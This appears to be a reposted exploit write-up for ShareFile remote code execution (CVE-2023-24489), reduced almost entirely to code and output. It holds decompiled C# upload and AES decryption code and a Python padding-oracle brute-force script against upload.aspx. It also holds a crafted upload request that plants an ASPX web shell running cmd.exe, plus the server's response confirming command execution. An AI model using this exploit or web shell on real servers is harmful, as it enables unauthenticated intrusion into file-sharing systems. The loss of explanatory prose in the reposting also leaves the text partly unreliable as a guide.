$ find . | grep -e '.*.aspx$'./sp/upload.aspx./sp/upload-streaming-2.aspx./documentum/upload.aspx./documentum/upload-streaming-2.aspx./upload-threaded-1.aspx./ConfigService/SMTPConfig.aspx./ConfigService/Login.aspx./ConfigService/Admin.aspx./ConfigService/Networking.aspx./ConfigService/PreFlightCheck.aspx./ConfigService/ImportConfigSettings.aspx./ConfigService/UpdatePassphrase.aspx./thumbnail.aspx./upload-resumable-2.aspx./upload-streaming-1.aspx./WopiServer/HeartBeat.aspx./upload-resumable-3.aspx./cifs/upload.aspx./cifs/upload-streaming-2.aspx./heartbeat.aspx./AdvancedStatus.aspx./upload-singlechunk.aspx./upload.aspx./ProxyService/rest/storagecenter.aspx./upload-resumable-1.aspx./upload-streaming-2.aspx./upload-threaded-3.aspx./upload-threaded-2.aspx./rest/queue.aspx
public static void SetCurrentPrinicalFromSessionCookie(){ HttpCookie httpCookie = HttpContext.Current.Request.Cookies["DocumentumConnector_AuthId"]; if (httpCookie != null) { string value = httpCookie.Value; if (!string.IsNullOrEmpty(value) && HttpContext.Current.Cache[value] != null) { IPrincipal principal = (IPrincipal)HttpContext.Current.Cache[value]; HttpContext.Current.User = principal; Thread.CurrentPrincipal = principal; } }}
...NameValueCollection keys = UploadLogic.GetKeys(HttpContext.Current);text = keys["uploadid"];text2 = keys["parentid"] ?? "";if (text2.IsNullOrEmpty()){ string text4 = string.Format("upload.aspx: ID='{0}' Missing parameters.", text2); LogManager.WriteLog(LogLevel.Normal, LogMessageType.Error, text4); ApiHelper.WriteError(text4); base.Response.End();}if (string.IsNullOrEmpty(text)){ text = Guid.NewGuid().ToString("n");}Upload.targetPath = FileUtility.GetDecryptedFolderPathById(text2);if (Upload.targetPath.IsNullOrEmpty()){ string text5 = string.Format("Upload.aspx: Could not resolve the target path from parent id", Array.Empty<object>()); LogManager.WriteLog(LogLevel.Normal, LogMessageType.Error, text5); ApiHelper.WriteError(text5);}...
private int ProcessRawPostedFile(string filename, string uploadId, Hashtable files, Hashtable fileHashes, string parentid, List<ItemUpload> itemsUploaded){ filename = Utils.SanitizeFilename(filename); string text = string.Concat(new string[] { DocumentumConnector.Util.OnPremise.ReadFromConfigFile("TempDir").TrimEnd(new char[] { '/' }), Path.DirectorySeparatorChar.ToString(), "ul-", uploadId, Path.DirectorySeparatorChar.ToString() }); if (!Directory.Exists(text)) { Directory.CreateDirectory(text); } string text2 = text + filename; string text3 = Upload.targetPath + filename; LogManager.WriteLog1(LogLevel.Normal, LogMessageType.Information, string.Format("upload.aspx.cs ProcessRawPostedFile(): using new code={0}, Request.TotalBytes={1}", !DocumentumConnector.Uploaders.Configuration.DisableFlashUploadImprovements, base.Request.TotalBytes)); int totalBytes = base.Request.TotalBytes; byte[] array = new byte[totalBytes]; Stream inputStream = base.Request.InputStream; inputStream.Read(array, 0, totalBytes); inputStream.Close(); FileStream fileStream = new FileStream(text2, FileMode.Create, FileAccess.ReadWrite); fileStream.Write(array, 0, totalBytes); fileStream.Close(); string text4 = null;
string text3 = Upload.targetPath + filename;
string text = string.Empty;try{ Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passPhrase, OnPremise._salt); symmetricAlgorithm = Encryption.Wrapper.CreateAESObject(); symmetricAlgorithm.Key = rfc2898DeriveBytes.GetBytes(symmetricAlgorithm.KeySize / 8); symmetricAlgorithm.IV = rfc2898DeriveBytes.GetBytes(symmetricAlgorithm.BlockSize / 8); ICryptoTransform cryptoTransform = symmetricAlgorithm.CreateDecryptor(symmetricAlgorithm.Key, symmetricAlgorithm.IV); using (MemoryStream memoryStream = new MemoryStream(Convert.FromBase64String(encryptedKey))) { using (CryptoStream cryptoStream = new CryptoStream(memoryStream, cryptoTransform, 0)) { using (StreamReader streamReader = new StreamReader(cryptoStream)) { text = streamReader.ReadToEnd(); } } }}catch (Exception ex){ LogManager.WriteLog(LogLevel.High, LogMessageType.Error, string.Format("ERROR:: DecryptKeyAES: Input[{0}] Output[{1}].", encryptedKey, text)); LogManager.WriteLog(LogLevel.High, LogMessageType.Error, string.Format("Exception: n{0} n{1}", ex.Message, ex.StackTrace));}return text;
01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16FF FF FF FF FF FF FF FF FF
01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16FF FF FF FF FF FF FF FF FF 07 07 07 07 07 07 07
?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 01
tempBlockZero = XorBlocks(plaintextBlocks[0], IV)ciphertextBlocks[0] = EncryptBlock(tempBlockZero) for n in range(1, numberOfBlocks): tempBlock = XorBlocks(plaintextBlocks[n], ciphertextBlocks[n-1]) ciphertextBlocks[n] = EncryptBlock(tempBlock)
tempBlockZero = DecryptBlock(ciphertextBlocks[0])plaintextBlocks[0] = XorBlocks(tempBlockZero, IV) for n in range(1, numberOfBlocks): tempBlock = DecryptBlock(ciphertextBlocks[n]) plaintextBlocks[n] = XorBlocks(tempBlock, ciphertextBlocks[n-1])
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- XX ciphertext (block 0)XOR -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ?? temp block (block 1 decrypted) = -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 01 our goal
for i in range(0, 256): payload = [ # block 0 b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', i.to_bytes(1, byteorder='little'), # block 1 b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41', b'x41' ] payload = b''.join(payload) payload = base64.b64encode(payload) payload = urllib.parse.quote(payload, safe='') url = 'http://{}/documentum/upload.aspx?parentid={}&uploadid=x'.format(TARGET, payload) r = requests.get(url, verify=False) if r.status_code == 200: if 'Invalid request method - GET' in r.text: print('Valid padding: {}'.format(payload)) sys.exit(0) else: print('Invalid padding: {}'.format(payload))
$ python3 padder.pyInvalid padding: QUFBQUFBQUFBQUFBQUFBAEFBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBAUFBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBAkFBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBA0FBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBBEFBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBBUFBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBBkFBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBB0FBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBCEFBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBCUFBQUFBQUFBQUFBQUFBQUE%3D...Invalid padding: QUFBQUFBQUFBQUFBQUFBgUFBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBgkFBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBg0FBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBhEFBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBhUFBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBhkFBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBh0FBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBiEFBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBiUFBQUFBQUFBQUFBQUFBQUE%3DInvalid padding: QUFBQUFBQUFBQUFBQUFBikFBQUFBQUFBQUFBQUFBQUE%3DValid padding: QUFBQUFBQUFBQUFBQUFBi0FBQUFBQUFBQUFBQUFBQUE%3D
POST /documentum/upload.aspx?parentid=QUFBQUFBQUFBQUFBQUFBi0FBQUFBQUFBQUFBQUFBQUE%3D&raw=1&unzip=on&uploadid=x......cifs&filename=x.aspx HTTP/1.1Host: example.comContent-Length: 720
<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){ Response.Write("<pre>"); Response.Write(Server.HtmlEncode(ExcuteCmd())); Response.Write("</pre>");}string ExcuteCmd(){ ProcessStartInfo psi = new ProcessStartInfo(); psi.FileName = "cmd.exe"; psi.Arguments = "/c whoami"; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; Process p = Process.Start(psi); StreamReader stmrdr = p.StandardOutput; string s = stmrdr.ReadToEnd(); stmrdr.Close(); return s;}</script>
GET /cifs/x.aspx HTTP/1.1Host: example.com HTTP/1.1 200 OKCache-Control: private,no-storeContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5Access-Control-Max-Age: 540Strict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockX-Frame-Options: DENYDate: Tue, 04 Jul 2023 04:32:24 GMTContent-Length: 41 <pre>nt authoritynetwork service</pre>
原文始发于微信公众号(Ots安全):ShareFile RCE (CVE-2023-24489)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论